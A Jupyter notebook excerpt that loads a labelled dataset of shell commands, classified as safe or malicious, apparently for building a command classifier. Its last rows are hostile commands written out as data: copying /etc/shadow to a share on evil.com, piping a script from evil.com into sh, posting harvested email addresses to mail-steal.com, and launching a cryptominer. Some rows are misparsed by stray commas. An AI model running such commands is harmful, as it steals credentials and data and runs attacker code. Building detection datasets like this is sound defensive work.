In [ ]:
import pandas as pd

In [4]:
data=pd.read_csv('Dataset\commands-classification-cleaned.csv')

In [9]:
data.head()


,id,command,classification
0,1,find . -name '*.txt'; less file.txt,safe
1,2,man ls; help cd,safe
2,3,cd /tmp; nano example.txt,safe
3,4,cd /tmp; nano example.txt,safe
4,5,cd /tmp; nano example.txt,safe


In [10]:
data.tail()

,id,command,classification
357,358,cd /tmp; nohup ./cryptominer -a cryptonight -o...,malicious
358,359,mount -t cifs //evil.com/share /mnt -o user=user,"pass=pass; cp /etc/shadow /mnt/,malicious"
359,360,cd /; find . -type f -size -100k 2>/dev/null |...,malicious
360,361,cd /var/mail; grep -r -E -o '\b[A-Za-z0-9._%+-...,"6}\b' * | curl -d @- hxxp://mail-steal.com,mal..."
361,362,"curl -s hxxp://evil.com/agent.sh | sh; echo ""*...",malicious
